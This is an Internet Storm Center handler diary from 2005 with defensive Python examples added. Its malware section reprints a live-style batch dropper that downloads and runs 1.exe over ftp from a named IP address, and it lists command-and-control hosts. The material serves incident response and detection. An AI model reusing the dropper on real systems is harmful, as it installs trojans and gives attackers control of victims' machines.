
SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2005-06-10



Mailbag Question, ZoneAlarm failure update, Michael Jackson Malware analysis, More on HIDS, IM Name Game submissions

Published: 2005-06-10
Last Updated: 2005-06-10 21:31:55 UTC
by Patrick Nolan (Version: 1)
A Question for System Profilers

A contributor has asked whether anyone has information on scans they have received from remote systems with the following port profile:

PORT STATE SERVICE VERSION
22/tcp open ssh?
53/tcp open domain ISC Bind 9.2.1
6703/tcp open unknown
6721/tcp open unknown
6722/tcp open unknown
6723/tcp open unknown
6737/tcp open unknown
6750/tcp open unknown
6760/tcp open unknown
6767/tcp open unknown

"Please note the text returned from connections to port 22: 'I wish I was special'. There appears to be no actual sshd daemon listening. A scan of the high 6700 ports returns no data from any of the open ports."
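A practitioner receiving a report like this would want to confirm the "no real sshd" observation rather than take it from the banner text alone. The following Python is an added example (not from the original diary or the contributor) that applies the RFC 4253 rule for the server identification string: a genuine SSH server must send a line beginning `SSH-<protoversion>-<softwareversion>`, optionally preceded by informational lines that do not start with `SSH-`. The sample banners are constructed; the "I wish I was special" text is the one quoted above, and the host in the usage comment is a placeholder.

```python
import re
import socket

# RFC 4253 section 4.2: "SSH-protoversion-softwareversion SP comments CR LF"
_ID_RE = re.compile(rb"^SSH-(?P<proto>[0-9.]+)-(?P<soft>\S+)(?: (?P<comment>.*))?$")


def parse_ssh_banner(data: bytes) -> dict:
    """Classify the first bytes a TCP/22 listener sends.

    Scans line by line for the first line starting with "SSH-" (a real server
    may send other informational lines first).  Returns a dict with 'is_ssh',
    and, when it is SSH, 'proto' and 'software'; otherwise a 'reason'.
    """
    for raw in data.split(b"\n"):
        line = raw.rstrip(b"\r")
        if not line.startswith(b"SSH-"):
            continue
        m = _ID_RE.match(line)
        if not m:
            return {"is_ssh": False,
                    "reason": "malformed identification string",
                    "banner": line.decode(errors="replace")}
        return {"is_ssh": True,
                "proto": m["proto"].decode(),
                "software": m["soft"].decode(),
                "banner": line.decode(errors="replace")}
    return {"is_ssh": False,
            "reason": "no SSH identification string",
            "banner": data.decode(errors="replace").strip()}


def grab_banner(host: str, port: int = 22, timeout: float = 5.0,
                max_bytes: int = 512) -> bytes:
    """Connect and read until the first newline, EOF, timeout or max_bytes.

    The server speaks first in SSH, so nothing is sent.
    """
    chunks, total = [], 0
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        while total < max_bytes:
            try:
                chunk = s.recv(max_bytes - total)
            except socket.timeout:
                break
            if not chunk:
                break
            chunks.append(chunk)
            total += len(chunk)
            if b"\n" in chunk:
                break
    return b"".join(chunks)


# Constructed sample banners (not captured from any real host).
CONSTRUCTED_BANNERS = {
    "openssh": b"SSH-2.0-OpenSSH_3.9p1\r\n",
    "with preamble": b"Welcome\r\nSSH-1.99-Cisco-1.25\r\n",
    "fake sshd": b"I wish I was special\n",   # the text quoted in the diary
    "malformed": b"SSH-bogus\r\n",
}

if __name__ == "__main__":
    for name, banner in CONSTRUCTED_BANNERS.items():
        print(name, "->", parse_ssh_banner(banner))
    # Live check (placeholder host): parse_ssh_banner(grab_banner("scanner.example"))
```

A listener that answers with anything other than a well-formed `SSH-` line is not an sshd, whatever the port number says; treat it as an unknown service and keep the full banner as an indicator.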

ZoneAlarm Failure Update

We have been contacted by ZoneLabs (a Check Point company) about yesterday's Diary entry and have been asked to post a link to their statement. According to a follow-up response to a question posed to ZoneLabs:

"Users using the ProgramAdvisor service in Automatic mode were potentially affected.

No systems were exposed as a result of the issue.

The firewall would not go into 'deny all', but would continue to enforce the current policy at the time the error occurred."
ZoneLabs, thanks for the answer!

Michael Jackson Suicide Note Malware

Several AV vendors are reporting the spread of an email containing a clickable link that supposedly points to additional information on a Michael Jackson suicide note. Clicking the link takes the victim to a web site that installs malware using exploits customized for different browsers. The Storm Center received an excellent analysis of the malware from Matt Corothers, and he has allowed us to reprint it here. Thanks, Matt!

"The server at abcnews-go.com was distributing malware via browser exploits (including Firefox). When you load the site, you get a fake "site is currently suspended" message, and a php script included as javascript checks your ip and browser. The first time you hit the site from a given ip, the php script then outputs some javascript that forwards you to the exploit page for your browser. Subsequent hits return nothing.

The exploit creates this batch file which downloads and executes a trojan via ftp from the same ip:

@ECHO OFF
:BEGIN
CLS
echo open 202.71.102.106>c:\1.dat
echo ls>>c:\1.dat
echo binary>>c:\1.dat
echo recv 1.exe c:\1.exe>>c:\1.dat
echo quit>>c:\1.dat
ftp -n -s:c:\1.dat -A
start /min c:\1.exe
del c:\1.dat

:END

1.exe periodically posts information about the infected computer to a cgi script at nugget-sales.com, currently 83.149.82.168.

The CGI responds with commands, the first of which is for the trojan to update itself using http to 83.149.82.168/dtr/rplay93.exe. rplay93.exe appears to be a different version of the same malware. It also periodically posts to nugget-sales.com. Other than the update command, I'm not really sure what the trojan is supposed to be doing. Part of the cgi response appears to be a command to load www.microsoft.com, which it does occasionally.

Some of the IP addresses and links are still alive at the time of this writing, so exercise caution if your curiosity gets the best of you. The malware may also reappear at other sites in the future. Additional details are available on most major AV vendor sites.
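The batch file in the analysis above is a textbook FTP-script dropper: each `echo` appends one ftp command to a script file, ftp.exe replays that file non-interactively (`-n` suppresses auto-login, `-s:` names the script, `-A` logs in anonymously), and the fetched binary is started. During incident response the useful product is the indicator set: FTP host, fetched file and local path, and what was executed. The following Python is an added example, not part of Matt's analysis, that pulls those indicators out of a batch file of this shape. The sample input is the dropper quoted above; the regexes assume the common `echo ...>file` / `ftp -s:file` / `start file.exe` idiom rather than every cmd.exe quoting variant.

```python
import re
from dataclasses import dataclass, field


@dataclass
class DropperIOCs:
    ftp_hosts: list = field(default_factory=list)     # servers named by "open"
    script_files: list = field(default_factory=list)  # files passed to ftp -s:
    downloads: list = field(default_factory=list)     # (remote name, local path)
    executed: list = field(default_factory=list)      # binaries started afterwards


# "echo <ftp command>>c:\1.dat" or "echo <ftp command>>>c:\1.dat"
_ECHO_RE = re.compile(r"^\s*echo\s+(?P<payload>.*?)\s*>{1,2}\s*(?P<file>\S+)\s*$", re.I)
# "ftp -n -s:c:\1.dat -A": the script file ftp.exe will replay
_FTP_RE = re.compile(r"^\s*ftp\b.*?-s:(?P<file>\S+)", re.I)
# "start /min c:\1.exe" or a bare "c:\1.exe"
_START_RE = re.compile(r"^\s*(?:start\b(?:\s+/\w+)*\s+)?(?P<exe>\S+\.exe)\s*$", re.I)


def analyze_batch(text: str) -> DropperIOCs:
    """Reconstruct the ftp script(s) a batch file builds and extract indicators."""
    iocs = DropperIOCs()
    scripts = {}  # script path (lowercased) -> ftp commands in order
    for line in text.splitlines():
        m = _ECHO_RE.match(line)
        if m:
            scripts.setdefault(m["file"].lower(), []).append(m["payload"])
            continue
        m = _FTP_RE.match(line)
        if m:
            iocs.script_files.append(m["file"])
            continue
        m = _START_RE.match(line)
        if m:
            iocs.executed.append(m["exe"])
    # Only replay scripts that ftp.exe is actually told to run.
    for path in iocs.script_files:
        for cmd in scripts.get(path.lower(), []):
            parts = cmd.split()
            if not parts:
                continue
            verb = parts[0].lower()
            if verb == "open" and len(parts) >= 2:
                iocs.ftp_hosts.append(parts[1])
            elif verb in ("get", "recv", "mget") and len(parts) >= 2:
                local = parts[2] if len(parts) >= 3 else parts[1]
                iocs.downloads.append((parts[1], local))
    return iocs


def is_ftp_dropper(text: str) -> bool:
    """True when the file connects out, fetches something, and runs it."""
    i = analyze_batch(text)
    return bool(i.ftp_hosts and i.downloads and i.executed)


# Sample input: the dropper quoted in the analysis above.
SAMPLE_BATCH = r"""@ECHO OFF
:BEGIN
CLS
echo open 202.71.102.106>c:\1.dat
echo ls>>c:\1.dat
echo binary>>c:\1.dat
echo recv 1.exe c:\1.exe>>c:\1.dat
echo quit>>c:\1.dat
ftp -n -s:c:\1.dat -A
start /min c:\1.exe
del c:\1.dat
:END
"""

if __name__ == "__main__":
    print(analyze_batch(SAMPLE_BATCH))
    print("dropper:", is_ftp_dropper(SAMPLE_BATCH))
```

The extracted host and filename are what you feed to egress filtering and to a search of proxy and firewall logs for other victims; the `c:\1.exe` path is the host-side artefact to look for.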

Opinion - More on HIDS

Configuring HIDS agents to report the "events" that matter is always an interesting subject, and one would hope that more than one set of eyes is involved in selecting which events get reported. As noted in "The Tao of Network Security Monitoring: Beyond Intrusion Detection", "the alert is only the beginning of the quest, not the end." Success here depends, of course, on the agent's capabilities and configurability, and on the range of experience of the team selecting and classifying the importance of events for the environment where the agents are deployed.

Over the _years_ I've found that IntersectAlliance's products for *nix, Windows and some MS apps are as configurable as they get. I've also read other public posts about this product's performance. Extending this opinion, a contributor recently sent in a link to a recent MS document that has a basic list of events to consider. I regret I don't have the contributor's name anymore so I can publicly thank them for sending in the link, but "Thanks!".

So ... I'm soliciting Diary contributor suggestions for other lists of *nix events that should be considered for logging with *nix or MS HIDS agents. I'll post the list in my Diary next week. Anyone with product-specific precompiled lists of "important" events logged is also invited to share (within the confines of your license!).
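As a concrete instance of "selecting and classifying" agent events, here is an added Python example (not from the diary, and not Snare's or Microsoft's logic) that runs an ordered rule table over a handful of constructed *nix syslog lines and tiers them: 3 = investigate now, 2 = review, 1 = retain as correlation input. The second function shows why the low tier is still worth shipping to the collector: individually uninteresting failed-login events become an alert once correlated by source address. The rule names, tiers and log lines are all assumptions made for this illustration.

```python
import re
from collections import Counter

# Ordered rule table: first match wins, so specific rules precede general ones.
# Tiers are an assumption for this example:
#   3 = investigate now, 2 = review daily, 1 = retain, mainly for correlation.
RULES = [
    ("new_uid0_account", 3,
     re.compile(r"useradd\[\d+\]: new user: name=(?P<user>[^,]+), UID=0\b")),
    ("new_account", 2,
     re.compile(r"useradd\[\d+\]: new user: name=(?P<user>[^,]+)")),
    ("root_login_ok", 3,
     re.compile(r"sshd\[\d+\]: Accepted \w+ for root from (?P<ip>\S+)")),
    ("ssh_login_ok", 1,
     re.compile(r"sshd\[\d+\]: Accepted \w+ for (?P<user>\S+) from (?P<ip>\S+)")),
    ("ssh_login_failed", 1,
     re.compile(r"sshd\[\d+\]: Failed \w+ for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")),
    ("sudo_shell", 3,
     re.compile(r"sudo:\s+(?P<user>\S+) : .*COMMAND=(?P<cmd>\S*/(?:bash|sh|zsh|ksh))\s*$")),
    ("sudo_command", 2,
     re.compile(r"sudo:\s+(?P<user>\S+) : .*COMMAND=(?P<cmd>\S+)")),
]

# Constructed sample log (not real data): a short brute force that succeeds,
# followed by the kind of thing an intruder does next.
SAMPLE_LOG = """\
Jun 10 14:02:01 host sshd[1234]: Failed password for root from 10.0.0.5 port 4020 ssh2
Jun 10 14:02:05 host sshd[1235]: Failed password for invalid user admin from 10.0.0.5 port 4021 ssh2
Jun 10 14:02:09 host sshd[1236]: Failed password for root from 10.0.0.5 port 4022 ssh2
Jun 10 14:02:15 host sshd[1237]: Accepted password for root from 10.0.0.5 port 4023 ssh2
Jun 10 14:03:01 host useradd[1300]: new user: name=backdoor, UID=0, GID=0, home=/, shell=/bin/sh
Jun 10 14:03:20 host sudo:   alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/bin/bash
Jun 10 14:04:00 host cron[99]: (root) CMD (run-parts /etc/cron.hourly)
Jun 10 14:05:00 host sshd[1240]: Accepted publickey for bob from 10.0.0.9 port 5000 ssh2
"""


def classify(line: str):
    """Return {'event', 'tier', 'fields'} for the first matching rule, else None."""
    for name, tier, rx in RULES:
        m = rx.search(line)
        if m:
            return {"event": name, "tier": tier, "fields": m.groupdict()}
    return None


def triage(log_text: str, min_tier: int = 1) -> list:
    """Classify every line and keep events at or above min_tier."""
    out = []
    for line in log_text.splitlines():
        ev = classify(line)
        if ev and ev["tier"] >= min_tier:
            ev["line"] = line
            out.append(ev)
    return out


def brute_force_sources(log_text: str, threshold: int = 3) -> dict:
    """Correlate tier-1 failed logins: source IPs with >= threshold failures."""
    counts = Counter()
    for ev in triage(log_text):
        if ev["event"] == "ssh_login_failed":
            counts[ev["fields"]["ip"]] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for ev in triage(SAMPLE_LOG, min_tier=2):
        print(ev["tier"], ev["event"], ev["fields"])
    print("brute force from:", brute_force_sources(SAMPLE_LOG))
```

The point of the ordering is that a generic `ssh_login_ok` rule must not swallow the root case, and that the cron line correctly produces nothing: an event list that reports everything is as useless as one that reports nothing.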

References:

The IntersectAlliance agents are "Free, Open-Source, audit and event log agent software for a (HUGE/pn) variety of operating systems, and applications." Home users might consider giving the companion collection tool a whirl too; it's "A basic, free, Open-Source, centralised audit and eventlog collection tool for Windows" and anything else that can export to syslog.

Microsoft's document is The Security Monitoring and Attack Detection Planning Guide, http://www.microsoft.com/downloads/details.aspx?FamilyID=95a85136-f08f-4b20-942f-dc9ce56bcd1a

More on Snare at the SANS Reading Room.

The Tao of Network Security Monitoring: Beyond Intrusion Detection, by Richard Bejtlich, is available online.


Other related resources: read the tool's PDFs that come with the download.

IM attack Name Game Responses

From John Forsythe: "It's not meat, but it works: LIMA - layered instant message attack".

Anonymous said "Not bologna but Wiener. There was an old commercial jingle, 'I wish I were an Oscar Mayer wiener ...' Maybe wiener-job or wiener-work, etc. Thanks for all the great work you do."

Robert Darin said "Simple: WIMP - Windows IM parasite. Windows because only Microsoft based platforms are at risk to this type of cheap and pathetic attack."

Rhen Alderman suggested "phim" as an acronym for a ****** Instant Messenger.

Another anonymous suggestion - "You could always go with Wiener--as in, 'you've been wienered,' for Oscar-family attacks."

And Jason Martin suggested "Instant Messaging --> In-Stunt Messaging. Or even In-Stunt Messa-Gang."

Thanks everyone!


Patrick Nolan, with grateful assists from other Handlers and Contributors.